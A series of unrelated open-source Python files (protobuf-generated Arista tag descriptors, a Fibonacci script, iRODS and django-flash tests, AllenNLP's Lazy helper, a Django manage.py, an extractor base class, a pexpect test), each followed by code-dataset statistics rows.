_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.TagKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=96,
serialized_end=200,
)
_INTERFACETAGCONFIG = _descriptor.Descriptor(
name='InterfaceTagConfig',
full_name='arista.tag.v1.InterfaceTagConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTagConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=202,
serialized_end=266,
)
_INTERFACETAG = _descriptor.Descriptor(
name='InterfaceTag',
full_name='arista.tag.v1.InterfaceTag',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTag.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator_type', full_name='arista.tag.v1.InterfaceTag.creator_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002ro'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=268,
serialized_end=376,
)
_INTERFACETAGASSIGNMENTKEY = _descriptor.Descriptor(
name='InterfaceTagAssignmentKey',
full_name='arista.tag.v1.InterfaceTagAssignmentKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.InterfaceTagAssignmentKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.InterfaceTagAssignmentKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='device_id', full_name='arista.tag.v1.InterfaceTagAssignmentKey.device_id', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='interface_id', full_name='arista.tag.v1.InterfaceTagAssignmentKey.interface_id', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=379,
serialized_end=603,
)
_INTERFACETAGASSIGNMENTCONFIG = _descriptor.Descriptor(
name='InterfaceTagAssignmentConfig',
full_name='arista.tag.v1.InterfaceTagAssignmentConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.InterfaceTagAssignmentConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=605,
serialized_end=698,
)
_DEVICETAGCONFIG = _descriptor.Descriptor(
name='DeviceTagConfig',
full_name='arista.tag.v1.DeviceTagConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTagConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=700,
serialized_end=761,
)
_DEVICETAG = _descriptor.Descriptor(
name='DeviceTag',
full_name='arista.tag.v1.DeviceTag',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTag.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='creator_type', full_name='arista.tag.v1.DeviceTag.creator_type', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002ro'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=763,
serialized_end=868,
)
_DEVICETAGASSIGNMENTKEY = _descriptor.Descriptor(
name='DeviceTagAssignmentKey',
full_name='arista.tag.v1.DeviceTagAssignmentKey',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='label', full_name='arista.tag.v1.DeviceTagAssignmentKey.label', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='value', full_name='arista.tag.v1.DeviceTagAssignmentKey.value', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='device_id', full_name='arista.tag.v1.DeviceTagAssignmentKey.device_id', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\200\216\031\001'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=871,
serialized_end=1040,
)
_DEVICETAGASSIGNMENTCONFIG = _descriptor.Descriptor(
name='DeviceTagAssignmentConfig',
full_name='arista.tag.v1.DeviceTagAssignmentConfig',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='arista.tag.v1.DeviceTagAssignmentConfig.key', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=_b('\372\215\031\002rw'),
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1042,
serialized_end=1129,
)
_TAGKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_TAGKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGCONFIG.fields_by_name['key'].message_type = _TAGKEY
_INTERFACETAG.fields_by_name['key'].message_type = _TAGKEY
_INTERFACETAG.fields_by_name['creator_type'].enum_type = _CREATORTYPE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['device_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTKEY.fields_by_name['interface_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_INTERFACETAGASSIGNMENTCONFIG.fields_by_name['key'].message_type = _INTERFACETAGASSIGNMENTKEY
_DEVICETAGCONFIG.fields_by_name['key'].message_type = _TAGKEY
_DEVICETAG.fields_by_name['key'].message_type = _TAGKEY
_DEVICETAG.fields_by_name['creator_type'].enum_type = _CREATORTYPE
_DEVICETAGASSIGNMENTKEY.fields_by_name['label'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTKEY.fields_by_name['value'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTKEY.fields_by_name['device_id'].message_type = google_dot_protobuf_dot_wrappers__pb2._STRINGVALUE
_DEVICETAGASSIGNMENTCONFIG.fields_by_name['key'].message_type = _DEVICETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['TagKey'] = _TAGKEY
DESCRIPTOR.message_types_by_name['InterfaceTagConfig'] = _INTERFACETAGCONFIG
DESCRIPTOR.message_types_by_name['InterfaceTag'] = _INTERFACETAG
DESCRIPTOR.message_types_by_name['InterfaceTagAssignmentKey'] = _INTERFACETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['InterfaceTagAssignmentConfig'] = _INTERFACETAGASSIGNMENTCONFIG
DESCRIPTOR.message_types_by_name['DeviceTagConfig'] = _DEVICETAGCONFIG
DESCRIPTOR.message_types_by_name['DeviceTag'] = _DEVICETAG
DESCRIPTOR.message_types_by_name['DeviceTagAssignmentKey'] = _DEVICETAGASSIGNMENTKEY
DESCRIPTOR.message_types_by_name['DeviceTagAssignmentConfig'] = _DEVICETAGASSIGNMENTCONFIG
DESCRIPTOR.enum_types_by_name['CreatorType'] = _CREATORTYPE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
TagKey = _reflection.GeneratedProtocolMessageType('TagKey', (_message.Message,), dict(
DESCRIPTOR = _TAGKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.TagKey)
))
_sym_db.RegisterMessage(TagKey)
InterfaceTagConfig = _reflection.GeneratedProtocolMessageType('InterfaceTagConfig', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagConfig)
))
_sym_db.RegisterMessage(InterfaceTagConfig)
InterfaceTag = _reflection.GeneratedProtocolMessageType('InterfaceTag', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTag)
))
_sym_db.RegisterMessage(InterfaceTag)
InterfaceTagAssignmentKey = _reflection.GeneratedProtocolMessageType('InterfaceTagAssignmentKey', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGASSIGNMENTKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagAssignmentKey)
))
_sym_db.RegisterMessage(InterfaceTagAssignmentKey)
InterfaceTagAssignmentConfig = _reflection.GeneratedProtocolMessageType('InterfaceTagAssignmentConfig', (_message.Message,), dict(
DESCRIPTOR = _INTERFACETAGASSIGNMENTCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.InterfaceTagAssignmentConfig)
))
_sym_db.RegisterMessage(InterfaceTagAssignmentConfig)
DeviceTagConfig = _reflection.GeneratedProtocolMessageType('DeviceTagConfig', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagConfig)
))
_sym_db.RegisterMessage(DeviceTagConfig)
DeviceTag = _reflection.GeneratedProtocolMessageType('DeviceTag', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTag)
))
_sym_db.RegisterMessage(DeviceTag)
DeviceTagAssignmentKey = _reflection.GeneratedProtocolMessageType('DeviceTagAssignmentKey', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGASSIGNMENTKEY,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagAssignmentKey)
))
_sym_db.RegisterMessage(DeviceTagAssignmentKey)
DeviceTagAssignmentConfig = _reflection.GeneratedProtocolMessageType('DeviceTagAssignmentConfig', (_message.Message,), dict(
DESCRIPTOR = _DEVICETAGASSIGNMENTCONFIG,
__module__ = 'arista.tag.v1.tag_pb2'
# @@protoc_insertion_point(class_scope:arista.tag.v1.DeviceTagAssignmentConfig)
))
_sym_db.RegisterMessage(DeviceTagAssignmentConfig)
DESCRIPTOR._options = None
_TAGKEY._options = None
_INTERFACETAGCONFIG._options = None
_INTERFACETAG._options = None
_INTERFACETAGASSIGNMENTKEY._options = None
_INTERFACETAGASSIGNMENTCONFIG._options = None
_DEVICETAGCONFIG._options = None
_DEVICETAG._options = None
_DEVICETAGASSIGNMENTKEY._options = None
_DEVICETAGASSIGNMENTCONFIG._options = None
# @@protoc_insertion_point(module_scope)
| 39.343313 | 2,035 | 0.76744 | 2,405 | 19,711 | 5.985447 | 0.089813 | 0.035568 | 0.044321 | 0.029177 | 0.675512 | 0.647586 | 0.585689 | 0.580757 | 0.576381 | 0.576381 | 0 | 0.045612 | 0.109076 | 19,711 | 500 | 2,036 | 39.422 | 0.774102 | 0.041601 | 0 | 0.621924 | 1 | 0.002237 | 0.224465 | 0.186639 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017897 | 0 | 0.017897 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcb01ec305f04809e3a6ca1a1a52479e8d42fc7c | 262 | py | Python | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1 | 2021-04-09T04:15:24.000Z | 2021-04-09T04:15:24.000Z | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | null | null | null | languages/python/algorithm_fibo2.py | Andilyn/learntosolveit | fd15345c74ef543e4e26f4691bf91cb6dac568a4 | [
"BSD-3-Clause"
] | 1 | 2021-07-31T02:45:29.000Z | 2021-07-31T02:45:29.000Z | def fibo(n):
f = [0,1]
if n in f:
return f[n]
for i in range(2,n+1):
f.append(f[i-1] + f[i-2])
return f[n]
print fibo(37)
"""
print fibo(1)
print fibo(2)
print fibo(3)
print fibo(4)
print fibo(5)
print fibo(6)
print fibo(37)
"""
| 13.789474 | 33 | 0.541985 | 55 | 262 | 2.581818 | 0.363636 | 0.507042 | 0.112676 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.08377 | 0.270992 | 262 | 18 | 34 | 14.555556 | 0.659686 | 0 | 0 | 0.25 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.125 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
fcb5ff1aa487732a140a3585c9ba23911a288769 | 668 | py | Python | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 333 | 2015-01-15T15:42:29.000Z | 2022-03-19T19:16:15.000Z | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 3,551 | 2015-01-02T19:55:40.000Z | 2022-03-31T21:24:56.000Z | scripts/irods/test/test_client_hints.py | JustinKyleJames/irods | 59e9db75200e95796ec51ec20eb3b185d9e4b5f5 | [
"BSD-3-Clause"
] | 148 | 2015-01-31T16:13:46.000Z | 2022-03-23T20:23:43.000Z | from __future__ import print_function
import sys
import shutil
import os
if sys.version_info >= (2, 7):
import unittest
else:
import unittest2 as unittest
import os
import datetime
import socket
from .. import test
from . import settings
from .. import lib
from . import resource_suite
from ..configuration import IrodsConfig
class Test_ClientHints(resource_suite.ResourceBase, unittest.TestCase):
def setUp(self):
super(Test_ClientHints, self).setUp()
def tearDown(self):
super(Test_ClientHints, self).tearDown()
def test_client_hints(self):
self.admin.assert_icommand('iclienthints', 'STDOUT_SINGLELINE', 'plugins')
| 22.266667 | 82 | 0.747006 | 84 | 668 | 5.761905 | 0.52381 | 0.082645 | 0.053719 | 0.099174 | 0.115702 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005415 | 0.170659 | 668 | 29 | 83 | 23.034483 | 0.868231 | 0 | 0 | 0.086957 | 0 | 0 | 0.053973 | 0 | 0 | 0 | 0 | 0 | 0.043478 | 1 | 0.130435 | false | 0 | 0.608696 | 0 | 0.782609 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
fcbf5526c7f9b990b21dd4cfa6f440213421292a | 2,210 | py | Python | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 2 | 2020-08-29T20:29:38.000Z | 2022-03-28T02:58:42.000Z | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 67 | 2020-09-23T23:26:11.000Z | 2022-03-29T13:04:00.000Z | allennlp/common/lazy.py | jayjfu/allennlp | a3732d00a3e7dae3bff54bff19ece7b8b6eaca88 | [
"Apache-2.0"
] | 2 | 2021-01-19T10:58:28.000Z | 2022-02-23T19:09:36.000Z | import inspect
from typing import Callable, Generic, TypeVar, Type, Union
from allennlp.common.params import Params
T = TypeVar("T")
class Lazy(Generic[T]):
"""
This class is for use when constructing objects using `FromParams`, when an argument to a
constructor has a _sequential dependency_ with another argument to the same constructor.
For example, in a `Trainer` class you might want to take a `Model` and an `Optimizer` as arguments,
but the `Optimizer` needs to be constructed using the parameters from the `Model`. You can give
the type annotation `Lazy[Optimizer]` to the optimizer argument, then inside the constructor
call `optimizer.construct(parameters=model.parameters)`.
This is only recommended for use when you have registered a `@classmethod` as the constructor
for your class, instead of using `__init__`. Having a `Lazy[]` type annotation on an argument
to an `__init__` method makes your class completely dependent on being constructed using the
`FromParams` pipeline, which is not a good idea.
The actual implementation here is incredibly simple; the logic that handles the lazy
construction is actually found in `FromParams`, where we have a special case for a `Lazy` type
annotation.
```python
@classmethod
def my_constructor(
cls,
some_object: Lazy[MyObject],
optional_object: Lazy[MyObject] = None,
required_object_with_default: Lazy[MyObject] = Lazy(MyObjectDefault),
) -> MyClass:
obj1 = some_object.construct()
obj2 = None if optional_object is None else optional_object.construct()
obj3 = required_object_with_default.construct()
```
"""
def __init__(self, constructor: Union[Type[T], Callable[..., T]]):
constructor_to_use: Callable[..., T]
if inspect.isclass(constructor):
def constructor_to_use(**kwargs):
return constructor.from_params(Params({}), **kwargs) # type: ignore[union-attr]
else:
constructor_to_use = constructor
self._constructor = constructor_to_use
def construct(self, **kwargs) -> T:
return self._constructor(**kwargs)
| 37.457627 | 103 | 0.697738 | 282 | 2,210 | 5.336879 | 0.425532 | 0.034552 | 0.042525 | 0.025249 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.001741 | 0.220362 | 2,210 | 58 | 104 | 38.103448 | 0.871735 | 0.661086 | 0 | 0 | 0 | 0 | 0.001572 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0.133333 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 2 |
fcd586ec0db6d2f4b8eed8f2b31ec8ed9cf51566 | 687 | py | Python | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 37 | 2017-06-30T18:08:51.000Z | 2022-02-13T18:04:10.000Z | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 544 | 2017-06-21T00:29:20.000Z | 2022-02-01T21:37:38.000Z | app/backend/manage.py | bcgov/gwells | 7d69e65e993d37070961e06e6ce9c58a02d79363 | [
"Apache-2.0"
] | 59 | 2017-03-10T17:55:02.000Z | 2021-11-16T19:20:08.000Z | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gwells.settings")
from django.core.management import execute_from_command_line
from django.conf import settings
if settings.DEBUG:
if os.environ.get('RUN_MAIN') or os.environ.get('WERKZEUG_RUN_MAIN'):
if not os.environ.get('PYCHARM_HOSTED'):
import ptvsd
ptvsd.enable_attach(address = ('0.0.0.0', 3000))
print("Attached remote debugger ptvsd")
else:
print("ptvsd is not compatible with PyCharm, it uses pydevd")
execute_from_command_line(sys.argv)
| 32.714286 | 77 | 0.650655 | 89 | 687 | 4.786517 | 0.550562 | 0.084507 | 0.084507 | 0.103286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015474 | 0.247453 | 687 | 20 | 78 | 34.35 | 0.808511 | 0.029112 | 0 | 0 | 0 | 0 | 0.25976 | 0.033033 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0.133333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
fcd8a7fe801c380d0cc99b020e3491ff1be849f1 | 1,324 | py | Python | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | src/djangoflash/tests/context_processors.py | duct-tape/django-flash | ce77d3ca3d6823068984f898c3b44e2fef0beb8b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""djangoflash.context_processors test cases.
"""
from unittest import TestCase
from django.core.exceptions import SuspiciousOperation
from django.http import HttpRequest
from djangoflash.context_processors import CONTEXT_VAR, flash
from djangoflash.models import FlashScope
class FlashContextProcessorTestCase(TestCase):
"""Tests the context processor used to expose the flash to view templates.
"""
def setUp(self):
self.request = HttpRequest()
self.scope = FlashScope();
setattr(self.request, CONTEXT_VAR, self.scope);
def test_expose_flash(self):
"""FlashContextProcessor: should expose the flash to view templates.
"""
self.assertEqual(flash(self.request), {CONTEXT_VAR:self.scope})
def test_expose_inexistent_flash(self):
"""FlashContextProcessor: should fail when there's no flash available.
"""
delattr(self.request, CONTEXT_VAR)
self.assertTrue(isinstance(flash(self.request)[CONTEXT_VAR], \
FlashScope))
def test_expose_invalid_flash(self):
"""FlashContextProcessor: should fail when exposing an invalid object as being the flash.
"""
self.request.flash = 'Invalid object'
self.assertRaises(SuspiciousOperation, flash, self.request)
| 33.1 | 97 | 0.706949 | 147 | 1,324 | 6.265306 | 0.394558 | 0.083605 | 0.078176 | 0.091205 | 0.312704 | 0.2519 | 0.093377 | 0.093377 | 0.093377 | 0 | 0 | 0.000943 | 0.199396 | 1,324 | 39 | 98 | 33.948718 | 0.867925 | 0.294562 | 0 | 0 | 0 | 0 | 0.015436 | 0 | 0 | 0 | 0 | 0 | 0.157895 | 1 | 0.210526 | false | 0 | 0.263158 | 0 | 0.526316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fcdf356a0b95d5923efc711b67b00cf106ae3fd4 | 1,102 | py | Python | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | data/base/base_extractor.py | yovelcohen/ccl | ba2abe609110f21f1db7c0c95f785e4010df8abd | [
"MIT"
] | null | null | null | from typing import Optional
import requests
from data.base.base_data_class import BaseDataProcess
class BaseExtractor(BaseDataProcess):
@classmethod
def extract(cls, *args, **kwargs):
raise NotImplementedError
class BaseAPIExtractor(BaseExtractor):
def get_headers(self):
return {}
def get_url(self):
raise NotImplementedError
def get_url_params(self, params: Optional[dict] = None):
raise NotImplementedError
def get_request_body(self, data: Optional[dict] = None):
return
def handle_call_response(self, response):
"""
this method parses the api response data or raise errors and logs if needed
"""
raise NotImplementedError
def make_api_call(self, url_params: Optional[dict] = None, body_params: Optional[dict] = None):
url = self.get_url()
headers = self.get_headers()
body = self.get_request_body(body_params)
params = self.get_url_params(url_params)
resp = requests.get(url=url, headers=headers, params=params, data=body)
return resp
| 27.55 | 99 | 0.683303 | 132 | 1,102 | 5.537879 | 0.340909 | 0.04104 | 0.087551 | 0.090287 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.23412 | 1,102 | 39 | 100 | 28.25641 | 0.866114 | 0.068058 | 0 | 0.16 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.28 | false | 0 | 0.12 | 0.08 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
fce6603b5dad35c766145b59c395cc640151cb3c | 424 | py | Python | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 113 | 2019-05-09T15:37:47.000Z | 2022-03-14T04:02:01.000Z | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 58 | 2019-09-03T15:42:29.000Z | 2021-01-15T02:20:29.000Z | ivy/doc/examples/udp_test_expect.py | b1f6c1c4/cfg-enum | 1a08071bde87f578ceaf834004c01b593db9bce8 | [
"BSD-3-Clause"
] | 40 | 2016-01-02T19:13:18.000Z | 2018-10-27T11:38:00.000Z | import pexpect
import sys
def run(name,opts,res):
child = pexpect.spawn('./{}'.format(name))
child.logfile = sys.stdout
try:
child.expect('>')
child.sendline('foo.send(0,1,2)')
child.expect(r'< foo.recv\(1,2\)')
child.sendline('foo.send(1,0,3)')
child.expect(r'foo.recv\(0,3\)')
return True
except pexpect.EOF:
print child.before
return False
